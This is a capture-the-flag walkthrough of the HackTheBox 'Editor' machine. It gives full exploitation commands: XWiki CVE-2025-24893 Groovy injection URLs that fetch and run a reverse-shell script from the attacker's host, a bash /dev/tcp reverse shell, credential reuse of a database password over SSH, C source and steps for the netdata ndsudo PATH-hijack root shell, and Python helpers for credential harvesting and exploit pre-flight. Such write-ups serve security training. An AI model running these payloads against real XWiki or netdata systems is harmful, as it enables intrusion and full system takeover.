HackTheBox Editor Walkthrough

insidepwn

This was an easy Linux machine: an unauthenticated RCE in XWiki for the foothold, a reused database password for the user, and a PATH hijack against netdata's setuid ndsudo helper for root.

Initial Enumeration

  • First I ran an nmap scan, which found three open ports (22, 80 and 8080) and the hostname editor.htb; add it to your /etc/hosts (the format is IP, whitespace, hostname):
sudo nano /etc/hosts
<MACHINE_IP> editor.htb

  • When I opened the website on port 80, at first glance it looks like a code editor.

  • Port 8080 is running XWiki, an open-source wiki platform.

Foothold and user.txt

  • One more thing visible on the XWiki pages is the version: 15.10.8.

  • Googling that version shows it is vulnerable to CVE-2025-24893, an unauthenticated remote code execution: the SolrSearch page renders the `text` parameter inside a macro, and a crafted value can close that macro and run a Groovy script as a guest.

  • Searching for CVE-2025-24893 exploits did not turn up a ready-made reverse-shell script; most of the scripts I found only confirm that the site is vulnerable.

  • Then I stumbled across this GitHub script, https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py, which helped me exploit the bug and get a shell.

  • To exploit it we first create a shell.sh reverse-shell script, host it, make the target download it, and then make the target run it. The commands are below:

└─$ cat shell.sh     
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1
  • After creating shell.sh, start a Python web server on your machine to serve it:
└─$ python -m http.server 80
  • Then paste the following into the browser (change <YOUR_IP>). The `text` parameter closes the search macro with `}}}`, opens an `{{async}}` block containing a `{{groovy}}` macro, and the Groovy script runs `wget` on the server to fetch shell.sh into /tmp:
 http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln("wget%20-qO%20/tmp/shell.sh%20http://<YOUR_IP>/shell.sh".execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
  • That stages the shell on the target. Now start a listener locally and request a second payload that runs it:
nc -lnvp 4444 #in you local machine
http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22bash%20/tmp/shell.sh%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
💡
Open the two links in different tabs. Groovy's `.execute().text` waits for the child process to exit, so the second request stays pending for as long as the reverse shell is alive; that is expected. If you do not get a shell, re-issue the first link to re-upload shell.sh and try the second one again.
  • With that we get a shell as the xwiki user:
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.xx.xx.xx] 57484
bash: cannot set terminal process group (1129): Inappropriate ioctl for device
bash: no job control in this shell
xwiki@editor:/usr/lib/xwiki-jetty$ whoami
whoami
xwiki
xwiki@editor:/usr/lib/xwiki-jetty$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
  • In the /etc/passwd output, the only regular account with a home under /home and a login shell is oliver.

  • While enumerating, look at /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml, XWiki's database configuration; it holds the database connection password in clear text:

xwiki@editor:/usr/lib/xwiki$ cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
  • The first match is the live database password, theEd1t0rTeam99; the remaining matches are the sample settings for other database backends that the stock XWiki file also carries. That password is reused for oliver's local account, so it also works over SSH:
ssh oliver@editor.htb
  • Enter the password and you get a shell as oliver, whose home directory holds user.txt.
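As an added example (not from the original post), here is a small Python script that pulls only the live connection settings out of a hibernate.cfg.xml, since `grep` also matches the commented-out sample blocks, and lists the login-capable accounts from /etc/passwd against which a reused database password is worth trying. The XML and passwd text below are constructed samples in the shape of the box's files, not copies of them.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of XWiki's hibernate.cfg.xml: one live
# <session-factory> block plus commented-out alternatives (the stock file
# carries several). Not the file from the box.
SAMPLE_HIBERNATE_CFG = """<hibernate-configuration>
  <session-factory>
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
    <!--
    <property name="hibernate.connection.url">jdbc:postgresql://localhost/xwiki</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    -->
    <!--
    <property name="hibernate.connection.url">jdbc:hsqldb:file:database/xwiki_db</property>
    <property name="hibernate.connection.username">sa</property>
    <property name="hibernate.connection.password"></property>
    -->
  </session-factory>
</hibernate-configuration>
"""

# Constructed /etc/passwd excerpt: two shell accounts, two service accounts.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
"""

CONN_KEYS = ("url", "username", "password")
NO_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/usr/bin/nologin", "/bin/false"}


def count_password_lines(text: str) -> int:
    """What `grep password` sees: every line naming the property, comments included."""
    return sum("hibernate.connection.password" in line for line in text.splitlines())


def active_db_credentials(xml_text: str) -> dict:
    """Connection settings from the live <session-factory> only. ElementTree discards
    comments while parsing, so the commented-out sample blocks never reach us."""
    creds = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        for key in CONN_KEYS:
            if prop.get("name") == "hibernate.connection." + key:
                creds[key] = (prop.text or "").strip()
    return creds


def login_users(passwd_text: str) -> list:
    """Accounts with a real shell, i.e. the ones a reused DB password could log into."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NO_LOGIN_SHELLS:
            users.append(fields[0])
    return users


def reuse_candidates(xml_text: str, passwd_text: str) -> list:
    """(user, password) pairs to try over SSH: the live DB password against each shell account."""
    password = active_db_credentials(xml_text).get("password", "")
    return [(u, password) for u in login_users(passwd_text)] if password else []


if __name__ == "__main__":
    print("grep would match", count_password_lines(SAMPLE_HIBERNATE_CFG), "password lines")
    print("live credentials:", active_db_credentials(SAMPLE_HIBERNATE_CFG))
    for user, pw in reuse_candidates(SAMPLE_HIBERNATE_CFG, SAMPLE_PASSWD):
        print(f"try: ssh {user}@editor.htb  # password {pw}")
```

On the real box, feed it the actual files (`cat` them over the xwiki shell) instead of the samples; the point is that only one of the seven grep hits is a live credential, and the shell accounts are where reuse pays off.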

Privilege Escalation and root.txt

  • First I ran sudo -l, but oliver has no sudo rights:
oliver@editor:~$ sudo -l
[sudo] password for oliver: 
Sorry, user oliver may not run sudo on editor.
  • Then I ran ss -tulnp to list the listening sockets:
oliver@editor:~$ ss -tulnp
Netid     State      Recv-Q     Send-Q              Local Address:Port          Peer Address:Port    Process    
udp       UNCONN     0          0                       127.0.0.1:8125               0.0.0.0:*                  
udp       UNCONN     0          0                   127.0.0.53%lo:53                 0.0.0.0:*                  
udp       UNCONN     0          0                         0.0.0.0:68                 0.0.0.0:*                  
tcp       LISTEN     0          4096                    127.0.0.1:44303              0.0.0.0:*                  
tcp       LISTEN     0          128                       0.0.0.0:22                 0.0.0.0:*                  
tcp       LISTEN     0          511                       0.0.0.0:80                 0.0.0.0:*                  
tcp       LISTEN     0          151                     127.0.0.1:3306               0.0.0.0:*                  
tcp       LISTEN     0          4096                    127.0.0.1:8125               0.0.0.0:*                  
tcp       LISTEN     0          4096                    127.0.0.1:19999              0.0.0.0:*                  
tcp       LISTEN     0          4096                127.0.0.53%lo:53                 0.0.0.0:*                  
tcp       LISTEN     0          70                      127.0.0.1:33060              0.0.0.0:*                  
tcp       LISTEN     0          128                          [::]:22                    [::]:*                  
tcp       LISTEN     0          511                          [::]:80                    [::]:*                  
tcp       LISTEN     0          50             [::ffff:127.0.0.1]:8079                     *:*                  
tcp       LISTEN     0          50                              *:8080                     *:*
  • Port 19999 on localhost is netdata's default dashboard port (and /etc/passwd already showed a netdata account with /opt/netdata as its home).

  • Since it only listens on 127.0.0.1, I forwarded it over SSH to see what I could do with it.

  • Use the command below, then open http://localhost:19999 in your browser:

ssh -L 19999:127.0.0.1:19999 oliver@editor.htb

  • The dashboard shows a red banner saying the version is out of date; clicking it opens the update notice.

  • That notice shows the installed netdata version is 1.45.2.

  • Googling the version shows it is vulnerable: CVE-2024-32019, a local privilege escalation in ndsudo, netdata's setuid-root helper, which resolves the commands it runs (nvme and others) through the caller's PATH instead of a fixed absolute path.

💡
To read more about CVE-2024-32019, see the netdata advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
  • PoC (as described in the advisory):
  1. Place an executable with a name that is on ndsudo's list of commands (e.g. nvme) in a writable path.

  2. Set the PATH environment variable so that it contains this path, ahead of the real binary's directory.

  3. Run ndsudo with a command that will run the aforementioned executable.

  • So first we create malicious.c and compile it. Build it for the target's architecture and libc; if the binary fails on the target with a GLIBC version error, compile it with `gcc -static` instead:
└─$ cat malicious.c  
// malicious.c: a stand-in for the real `nvme` binary. ndsudo is setuid root and
// resolves `nvme` through PATH, so when it execs this file we already hold euid 0;
// setuid/setgid(0) make the real IDs root too so bash does not drop privileges.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
  if (setuid(0) != 0 || setgid(0) != 0) {
    perror("setuid/setgid");   // not euid 0: ndsudo did not exec us, or it is not setuid root
    return 1;
  }
  execl("/bin/bash", "bash", "-i", (char *)NULL);
  perror("execl");             // only reached if the exec itself fails
  return 1;
}
└─$ gcc -o nvme malicious.c
  • Then we place the binary in /tmp on the target. To transfer it, start a Python web server on the attacking machine in the directory that contains nvme:
└─$ python -m http.server 80
  • Then run the following in oliver's shell. The fake nvme must be executable and its directory must be prepended to PATH, so that when ndsudo's nvme-list command looks up nvme it finds ours first and executes it with root privileges:
cd /tmp
wget http://<YOUR_IP>/nvme
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp# whoami
root
root@editor:/tmp# cd /root/
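As an added example (not part of the walkthrough or of netdata), here is a Python pre-flight script for this step: it checks that ndsudo is a root-owned setuid binary, that the reported netdata version falls in the affected range, and walks PATH the way execvp does so you can see which `nvme` ndsudo would actually run. The ndsudo path and the /tmp staging directory are the ones used above; the version range is taken from the advisory linked above, and the script assumes a Linux target.

```python
import os
import stat
import sys

# Assumed defaults taken from the walkthrough; override with argv[1] (ndsudo path)
# and argv[2] (netdata version string as shown in the dashboard).
NDSUDO = "/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo"
HIJACK_DIR = "/tmp"
TARGET_NAME = "nvme"   # ndsudo's 'nvme-list' command execs 'nvme list'


def parse_version(ver: str) -> tuple:
    """'v1.45.2' or '1.45.2-rc1' -> (1, 45, 2); a pre-release suffix is dropped."""
    core = ver.strip().lstrip("v").split("-")[0]
    return tuple(int(p) for p in core.split("."))


def netdata_version_vulnerable(ver: str) -> bool:
    """Range from the advisory linked above: ndsudo appeared in 1.45.0 and the PATH fix
    shipped in 1.45.3. (The advisory also lists a 1.46.0 pre-release; ignored here.)"""
    return (1, 45, 0) <= parse_version(ver) < (1, 45, 3)


def mode_is_setuid_root(mode: int, uid: int) -> bool:
    """Regular file with the setuid bit, owned by uid 0: what makes the hijack give root."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def is_setuid_root(path: str) -> bool:
    try:
        st = os.stat(path)
    except OSError:
        return False
    return mode_is_setuid_root(st.st_mode, st.st_uid)


def hijacked_lookup(path_env: str, name: str, exists=os.path.exists) -> str:
    """Emulate the PATH walk execvp does: the first directory holding `name` wins,
    which is why the staging dir must be *prepended* to PATH. `exists` is injectable
    so the walk can be exercised without touching the filesystem."""
    for d in path_env.split(":"):
        candidate = os.path.join(d, name)
        if d and exists(candidate):
            return candidate
    return ""


def preflight(ndsudo: str = NDSUDO, version: str = "", hijack_dir: str = HIJACK_DIR) -> dict:
    """The checks worth doing before compiling and uploading anything."""
    path_env = hijack_dir + ":" + os.environ.get("PATH", "")
    return {
        "ndsudo_setuid_root": is_setuid_root(ndsudo),
        "version_in_range": netdata_version_vulnerable(version) if version else None,
        "staging_dir_writable": os.access(hijack_dir, os.W_OK),
        "resolved_nvme": hijacked_lookup(path_env, TARGET_NAME),
    }


if __name__ == "__main__":
    nd = sys.argv[1] if len(sys.argv) > 1 else NDSUDO
    ver = sys.argv[2] if len(sys.argv) > 2 else ""
    for key, val in preflight(nd, ver).items():
        print(f"{key}: {val}")
```

Run it as oliver before the upload (`python3 preflight.py /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo 1.45.2`): `resolved_nvme` stays empty until the fake binary is in /tmp, and flips to `/tmp/nvme` once it is, which is exactly what ndsudo will exec.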

That's it for the machine. Hope you enjoyed solving it.

Thanks for reading the walkthrough. Hope you liked it! Do leave a comment for feedback or queries!
